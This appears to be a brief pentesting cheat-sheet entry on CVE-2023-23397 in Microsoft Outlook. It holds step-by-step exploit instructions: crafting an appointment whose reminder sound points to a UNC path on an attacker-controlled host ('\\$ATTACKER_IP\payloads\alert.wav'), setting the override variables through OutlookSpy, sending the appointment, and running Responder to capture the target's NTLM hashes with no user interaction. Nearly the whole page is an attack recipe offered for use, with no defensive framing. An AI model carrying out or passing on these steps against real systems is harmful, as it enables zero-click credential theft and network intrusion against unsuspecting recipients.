1.2 KiB
Outlook Exploits
CVE-2023-23397
Create an Appointment with a custom and malicious reminder sound. The sound file download uses Universal Naming Convention (UNC) paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target.
Therefore, PidLidReminderFileParameter have to be altered containing the UNC, for example \\$ATTACKER_IP:$ATTACKER_PORT\payload.wav. The source of the file may use SMB or WebDAV.
Further, PidLidReminderOverride has to be set to true.
Usage
New Appointment --> set Reminder to 0 minutes.
Outlook Spy plugin is needed. Go to OutlookSpy tab, press CurrentItem and go to Script
Set the following variables:
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
- Set up
responder -I <interface>to catch the NTLM hash.
Press Run to save the variables. Send the appointment afterwards.